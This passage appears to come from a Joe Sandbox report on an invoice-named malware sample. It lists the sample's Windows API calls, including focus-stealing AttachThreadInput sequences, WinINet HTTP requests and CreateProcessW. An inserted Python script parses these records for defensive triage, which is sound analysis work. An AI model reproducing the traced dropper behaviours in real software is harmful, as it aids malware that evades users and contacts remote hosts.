                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafeVartype
                                                                            • String ID:
                                                                            • API String ID: 1725837607-0
                                                                            • Opcode ID: 8bac33cf252c2ff2a3a108c6665e85ec114cfc55f46f9882deaf500a86ca12af
                                                                            • Instruction ID: 73e2e44dab5b17db8d0a92d66641ba662693cbb2c3511ba127bb857f0bc52a9e
                                                                            • Opcode Fuzzy Hash: 8bac33cf252c2ff2a3a108c6665e85ec114cfc55f46f9882deaf500a86ca12af
                                                                            • Instruction Fuzzy Hash: D8B15DB190831A9FDB20EF94C885BBEB7F4EF49331F245469E601E7251D734A941EBA0
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00F311F0
                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F30268,?,00000001), ref: 00F31204
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00F3120B
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F30268,?,00000001), ref: 00F3121A
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F3122C
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F30268,?,00000001), ref: 00F31245
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F30268,?,00000001), ref: 00F31257
                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F30268,?,00000001), ref: 00F3129C
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F30268,?,00000001), ref: 00F312B1
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F30268,?,00000001), ref: 00F312BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                            • String ID:
                                                                            • API String ID: 2156557900-0
                                                                            • Opcode ID: e609a8aed0e15d6b0ca6441cb55049bc53412327c3a23648f643a3033c99c48f
                                                                            • Instruction ID: 624af44c813777ead45ce03086e87d393ca74456b767754f7510f724ae4cf6c0
                                                                            • Opcode Fuzzy Hash: e609a8aed0e15d6b0ca6441cb55049bc53412327c3a23648f643a3033c99c48f
                                                                            • Instruction Fuzzy Hash: 0B316D75A00308BBDB209F54EC88F6A77A9BB55336F108166FE05D62A0E7B4DD44AF60
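The function above is the one worth pausing on in this run of records: GetForegroundWindow, GetWindowThreadProcessId and a run of AttachThreadInput(…, TRUE) followed by AttachThreadInput(…, FALSE) is the standard way to defeat the SetForegroundWindow restriction, and it is what an AutoIt WinActivate compiles to. The following Python is an added example, not part of the Joe Sandbox report: it parses these per-function records (the bullet lines under "APIs" and "Similarity", including the indented "Part of subcall function" entries), flags API clusters with rule names of my own choosing ("focus-steal", "com-moniker"), tallies the fAttach argument of each AttachThreadInput call, and indexes Instruction Fuzzy Hashes by API ID so functions can be correlated across reports. The record text embedded in `SAMPLE` is copied from this report's own listing, trimmed to three records. One caveat built into the code: Joe Sandbox prints raw stack slots as arguments, so the third slot is only read as fAttach when it resolves to 00000000 or 00000001; a "?" is counted as unresolved rather than guessed.

```python
import re
from collections import Counter

# Constructed sample: three complete records copied from this report's own
# function listing, leading indentation dropped. Not a full export.
SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 00F311F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F30268,?,00000001), ref: 00F31204
• GetWindowThreadProcessId.USER32(00000000), ref: 00F3120B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F30268,?,00000001), ref: 00F3121A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00F3122C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F30268,?,00000001), ref: 00F31245
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F30268,?,00000001), ref: 00F31257
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F30268,?,00000001), ref: 00F3129C
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F30268,?,00000001), ref: 00F312B1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F30268,?,00000001), ref: 00F312BC
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Instruction Fuzzy Hash: 0B316D75A00308BBDB209F54EC88F6A77A9BB55336F108166FE05D62A0E7B4DD44AF60
APIs
• VariantInit.OLEAUT32(?), ref: 00F488D7
• CoInitialize.OLE32(00000000), ref: 00F48904
• GetRunningObjectTable.OLE32(00000000,?), ref: 00F48A0E
• CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002,?,00000001,00F62C0C), ref: 00F48B6F
• CoGetObject.OLE32(?,00000000,00F62C0C,?), ref: 00F48B92
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• Instruction Fuzzy Hash: ECC115B1608305AFC700EF64C88492BBBE9FF89798F00495DF9899B251DB71ED06DB52
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00ED2EAE
  • Part of subcall function 00ED1DB3: GetClientRect.USER32(?,?), ref: 00ED1DDC
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F0CDFB
Similarity
• String ID: U
• Instruction Fuzzy Hash: 7871C431900209DFCF218F64CC84AEA7BB5FF58325F14436AEE556B2A6C7319842FB90
"""

# "Api.MODULE(args), ref: ADDR" or "Api.MODULE ref: ADDR" (no argument list).
CALL_RE = re.compile(
    r"^(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})$"
)
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<caller>[0-9A-F]{8}):\s+(?P<call>.+)$")
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z][A-Za-z ]*):\s*(?P<value>.*)$")

# Rule names and API sets are this example's own, not Joe Sandbox signatures.
RULES = {
    "focus-steal": {"GetForegroundWindow", "GetWindowThreadProcessId", "AttachThreadInput"},
    "com-moniker": {"CoGetObject", "GetRunningObjectTable"},
}


def parse_records(text):
    """Split report text into records, one per 'APIs' header."""
    records, rec = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            rec = {"calls": [], "fields": {}}
            records.append(rec)
            continue
        if rec is None or not line.startswith("•"):
            continue  # section headers ("Similarity", ...) carry no data themselves
        body = line.lstrip("•").strip()
        caller = None
        m = SUBCALL_RE.match(body)
        if m:  # indented entry inherited from a callee
            caller, body = m.group("caller"), m.group("call")
        m = CALL_RE.match(body)
        if m:
            args = m.group("args")
            rec["calls"].append({"api": m.group("api"), "module": m.group("module"),
                                 "args": args.split(",") if args else [],
                                 "ref": m.group("ref"), "via_subcall": caller})
            continue
        m = FIELD_RE.match(body)
        if m:
            rec["fields"][m.group("key")] = m.group("value")
    return records


def match_rules(rec):
    """Names of every rule whose whole API set appears in this record."""
    apis = {c["api"] for c in rec["calls"]}
    return sorted(name for name, need in RULES.items() if need <= apis)


def attach_detach_balance(rec):
    """(attach, detach, unresolved) counts from the fAttach slot of AttachThreadInput.

    Only a literal 00000001/00000000 in the third stack slot is trusted; '?' stays unresolved.
    """
    n = Counter()
    for c in rec["calls"]:
        if c["api"] != "AttachThreadInput":
            continue
        flag = c["args"][2] if len(c["args"]) > 2 else "?"
        n["attach" if flag == "00000001" else "detach" if flag == "00000000" else "unknown"] += 1
    return n["attach"], n["detach"], n["unknown"]


def fuzzy_hash_index(records):
    """Instruction Fuzzy Hash -> API ID, for diffing function sets across reports."""
    return {r["fields"]["Instruction Fuzzy Hash"]: r["fields"].get("API ID", "")
            for r in records if "Instruction Fuzzy Hash" in r["fields"]}


def triage(text):
    """(first call address, matched rules) for every record that trips a rule."""
    return [(r["calls"][0]["ref"], match_rules(r))
            for r in parse_records(text) if r["calls"] and match_rules(r)]


if __name__ == "__main__":
    for ref, hits in triage(SAMPLE):
        print(ref, ",".join(hits))
```

Feed `triage()` the text of a full report export rather than the trimmed sample to get every flagged function; `fuzzy_hash_index()` run over two reports of different AutoIt-compiled droppers shows which flagged functions are the shared interpreter runtime and which are specific to the script, which is the distinction that matters when deciding whether a hit is attributable to the payload or to AutoIt itself.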
                                                                            APIs
                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00EDFAA6
                                                                            • OleUninitialize.OLE32(?,00000000), ref: 00EDFB45
                                                                            • UnregisterHotKey.USER32(?), ref: 00EDFC9C
                                                                            • DestroyWindow.USER32(?), ref: 00F145D6
                                                                            • FreeLibrary.KERNEL32(?), ref: 00F1463B
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F14668
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                            • String ID: close all
                                                                            • API String ID: 469580280-3243417748
                                                                            • Opcode ID: 2b7e894197dcd9fe5ab544225e360fe080ec5159c11fe0d58c5547d7b17e0a9e
                                                                            • Instruction ID: b4e00e66ddd5136f258d8dd7a296ca509612d4a8504a8e21abd6bae4c95cb3f1
                                                                            • Opcode Fuzzy Hash: 2b7e894197dcd9fe5ab544225e360fe080ec5159c11fe0d58c5547d7b17e0a9e
                                                                            • Instruction Fuzzy Hash: 78A16A31701216CFCB18EF14C9A4AA9F3A4EF45714F1452AEE80ABB362DB30AD56DF50
                                                                            APIs
                                                                            • EnumChildWindows.USER32(?,00F2A439), ref: 00F2A377
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ChildEnumWindows
                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                            • API String ID: 3555792229-1603158881
                                                                            • Opcode ID: 14124ebe1d4b0637b358b978a75a6e923accb3fc8b1e8735c82f47c9fa1e0331
                                                                            • Instruction ID: 1c1417f34ee0cdaeee4a8485b7de3618d2c1b460f299c65dc0e195a2f5635a93
                                                                            • Opcode Fuzzy Hash: 14124ebe1d4b0637b358b978a75a6e923accb3fc8b1e8735c82f47c9fa1e0331
                                                                            • Instruction Fuzzy Hash: 8C91F731A00A19EBCB08EFA0D441BEDFBB5FF04310F509119D959B7282DF31A999EB91
                                                                            APIs
                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00ED2EAE
                                                                              • Part of subcall function 00ED1DB3: GetClientRect.USER32(?,?), ref: 00ED1DDC
                                                                              • Part of subcall function 00ED1DB3: GetWindowRect.USER32(?,?), ref: 00ED1E1D
                                                                              • Part of subcall function 00ED1DB3: ScreenToClient.USER32(?,?), ref: 00ED1E45
                                                                            • GetDC.USER32 ref: 00F0CD32
                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F0CD45
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00F0CD53
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00F0CD68
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00F0CD70
                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F0CDFB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                            • String ID: U
                                                                            • API String ID: 4009187628-3372436214
                                                                            • Opcode ID: e1d2bdd0101b59c3fc0ab0cc3f5b8c94ed2bad8c267a137d0796662954e64b33
                                                                            • Instruction ID: ec9f7fb0e21238401fe622efdeed99dcc82173098d482c8390931e636955ecd4
                                                                            • Opcode Fuzzy Hash: e1d2bdd0101b59c3fc0ab0cc3f5b8c94ed2bad8c267a137d0796662954e64b33
                                                                            • Instruction Fuzzy Hash: 7871C431900209DFCF218F64CC84AEA7BB5FF58325F14436AEE556B2A6C7319842FB90
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F41A50
                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F41A7C
                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F41ABE
                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F41AD3
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F41AE0
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F41B10
                                                                            • InternetCloseHandle.WININET(00000000), ref: 00F41B57
                                                                              • Part of subcall function 00F42483: GetLastError.KERNEL32(?,?,00F41817,00000000,00000000,00000001), ref: 00F42498
                                                                              • Part of subcall function 00F42483: SetEvent.KERNEL32(?,?,00F41817,00000000,00000000,00000001), ref: 00F424AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                            • String ID:
                                                                            • API String ID: 2603140658-3916222277
                                                                            • Opcode ID: 87f926fb372b02a6b386ddb28345e2bf8b101fb3ba4de1f61fe9c35d36955b2d
                                                                            • Instruction ID: 4e5a5d6ab17c993d8beaa72e1ffcd4ddf11cc09b69373c3afda84085e740dca3
                                                                            • Opcode Fuzzy Hash: 87f926fb372b02a6b386ddb28345e2bf8b101fb3ba4de1f61fe9c35d36955b2d
                                                                            • Instruction Fuzzy Hash: F7416CB1901219BFEB119F50CC89FBA7FACFB48354F00416AFE059A151E7749E84ABA0
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F5F910), ref: 00F48D28
                                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F5F910), ref: 00F48D5C
                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F48ED6
                                                                            • SysFreeString.OLEAUT32(?), ref: 00F48F00
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                            • String ID:
                                                                            • API String ID: 560350794-0
                                                                            • Opcode ID: be630b99afa230c628483fa667c8afffca89cbb07967210695104703e56f8010
                                                                            • Instruction ID: fd6ec04379e4e4ce752dc3748df011ebf273865baa2e639e6c033cb0cbb3fc7c
                                                                            • Opcode Fuzzy Hash: be630b99afa230c628483fa667c8afffca89cbb07967210695104703e56f8010
                                                                            • Instruction Fuzzy Hash: C9F15C71A00209EFCF14DFA4C884EAEBBB9FF45355F108498F906AB251DB71AE46DB50
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F4F6B5
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F4F848
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F4F86C
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F4F8AC
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F4F8CE
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F4FA4A
                                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F4FA7C
                                                                            • CloseHandle.KERNEL32(?), ref: 00F4FAAB
                                                                            • CloseHandle.KERNEL32(?), ref: 00F4FB22
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                            • String ID:
                                                                            • API String ID: 4090791747-0
                                                                            • Opcode ID: 5b1f8b9e1a91cbd2ffc3c7d25a121da65dba9878c17e22147d94e7ff354fcf51
                                                                            • Instruction ID: c3825021c1dd10adb5748a5a866ce7723e2825921ad3f5c991f20043b17dcfc9
                                                                            • Opcode Fuzzy Hash: 5b1f8b9e1a91cbd2ffc3c7d25a121da65dba9878c17e22147d94e7ff354fcf51
                                                                            • Instruction Fuzzy Hash: 38E1C1316043409FC714EF24C881B6ABBE1EF85364F14846DF9899B3A2CB35EC49DB52
                                                                            APIs
                                                                              • Part of subcall function 00ED1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00ED2036,?,00000000,?,?,?,?,00ED16CB,00000000,?), ref: 00ED1B9A
                                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00ED20D3
                                                                            • KillTimer.USER32(-00000001,?,?,?,?,00ED16CB,00000000,?,?,00ED1AE2,?,?), ref: 00ED216E
                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00F0BCA6
                                                                            • DeleteObject.GDI32(00000000), ref: 00F0BD1C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 2402799130-0
                                                                            • Opcode ID: 7d4ca2edfe5ad9e107a1e883acdfaab5036f83300764b6e6e00a95f23bdacb0b
                                                                            • Instruction ID: e0a1be3edb58487fad441124e7e95ce76c16cb9912b3cd63828493c30ddd9371
                                                                            • Opcode Fuzzy Hash: 7d4ca2edfe5ad9e107a1e883acdfaab5036f83300764b6e6e00a95f23bdacb0b
                                                                            • Instruction Fuzzy Hash: 6061AE30501B08DFDB36AF14D948B2AB7F1FF50716F10952EE642AA6B0C770A886FB50
                                                                            APIs
                                                                              • Part of subcall function 00F3466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F33697,?), ref: 00F3468B
                                                                              • Part of subcall function 00F3466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F33697,?), ref: 00F346A4
                                                                              • Part of subcall function 00F34A31: GetFileAttributesW.KERNEL32(?,00F3370B), ref: 00F34A32
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00F34D40
                                                                            • _wcscmp.LIBCMT ref: 00F34D5A
                                                                            • MoveFileW.KERNEL32(?,?), ref: 00F34D75
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 793581249-0
                                                                            • Opcode ID: c1a6617c5654d1fe6b20a46d88103f4908967f1c7616ce643758135b53aa71a4
                                                                            • Instruction ID: a2ef7f7af2c4ecffb2b88249f041340f1f7f26f03646f93325d7851484a77824
                                                                            • Opcode Fuzzy Hash: c1a6617c5654d1fe6b20a46d88103f4908967f1c7616ce643758135b53aa71a4
                                                                            • Instruction Fuzzy Hash: 8D5143B24083459BC724DBA4DC819DFB3ECAF85360F00092EB689D3151EF35B689D766
                                                                            APIs
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F586FF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 634782764-0
                                                                            • Opcode ID: e3930a50dc86e9fe7469071b6c846d5f7da568f3f76447207b1450f051fa92ed
                                                                            • Instruction ID: ebe2f96ebf610fee3b6d7f42b15d5b79790cfb6d21b10cbd06ebc00a078f08ec
                                                                            • Opcode Fuzzy Hash: e3930a50dc86e9fe7469071b6c846d5f7da568f3f76447207b1450f051fa92ed
